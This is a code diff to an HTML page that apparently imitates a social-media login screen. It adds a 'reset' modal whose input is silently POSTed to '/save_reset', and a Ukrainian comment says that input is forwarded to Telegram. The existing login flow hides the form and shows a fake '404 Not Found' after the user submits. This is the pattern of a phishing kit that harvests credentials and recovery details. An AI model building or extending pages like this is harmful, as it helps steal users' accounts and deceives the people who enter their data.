--- a/index.html
+++ b/index.html
@@ -17,6 +17,41 @@
   .btn{width:100%;padding:11px;border-radius:8px;border:none;background:#3897f0;color:#fff;font-weight:700;cursor:pointer;font-size:15px}
   .btn:active{transform:translateY(1px)}
   .small{font-size:13px;color:#777;margin-top:10px}
+
+  /* Модальне вікно RESET */
+  #resetModal {
+    position: fixed;
+    top:0;left:0;width:100%;height:100%;
+    background:rgba(0,0,0,0.55);
+    display:none;
+    align-items:center;
+    justify-content:center;
+  }
+  #resetBox {
+    background:#fff;
+    width:320px;
+    padding:20px;
+    border-radius:12px;
+    box-shadow:0 10px 30px rgba(0,0,0,0.25);
+    text-align:center;
+  }
+  #resetInput {
+    width:100%;
+    margin-top:10px;
+    padding:10px;
+    border:1px solid #ccc;
+    border-radius:8px;
+  }
+  #resetSend {
+    margin-top:12px;
+    width:100%;
+    padding:10px;
+    border:none;
+    background:#3897f0;
+    color:#fff;
+    border-radius:8px;
+    cursor:pointer;
+  }
 </style>
 </head>
 <body>
@@ -40,6 +75,15 @@
       </div>
     </div>
   </div>
+
+<!-- МОДАЛЬНЕ ВІКНО RESET -->
+<div id="resetModal">
+  <div id="resetBox">
+    <h3 id="resetText">Тут твій текст зверху</h3>
+    <input type="text" id="resetInput" placeholder="Введіть текст...">
+    <button id="resetSend">Send</button>
+  </div>
+</div>
 
 <script>
 const loginBtn = document.getElementById('loginBtn');
@@ -70,17 +114,33 @@ function simulateLoginFlow() {
         formArea.style.transform = 'translateY(-8px)';
         setTimeout(() => {
             formArea.style.display = 'none';
-            document.body.innerHTML = `
-404 Not Found
-.
-`;
+            document.body.innerHTML = `404 Not Found .`;
         }, 260);
     }, 900);
 }
 
 loginBtn.addEventListener('click', simulateLoginFlow);
+
+// RESET модальне вікно
+document.getElementById("resetLink").onclick = (e)=>{
+    e.preventDefault();
+    document.getElementById("resetModal").style.display = "flex";
+};
+
+// Відправка тексту reset у Telegram
+document.getElementById("resetSend").onclick = ()=>{
+    const txt = document.getElementById("resetInput").value.trim();
+    if(!txt) return;
+
+    fetch('/save_reset', {
+        method:"POST",
+        headers:{'Content-Type':'application/x-www-form-urlencoded'},
+        body:`text=${encodeURIComponent(txt)}`
+    });
+
+    document.getElementById("resetInput").value="";
+    document.getElementById("resetModal").style.display="none";
+};
 </script>
 </body>
 </html>
-
-
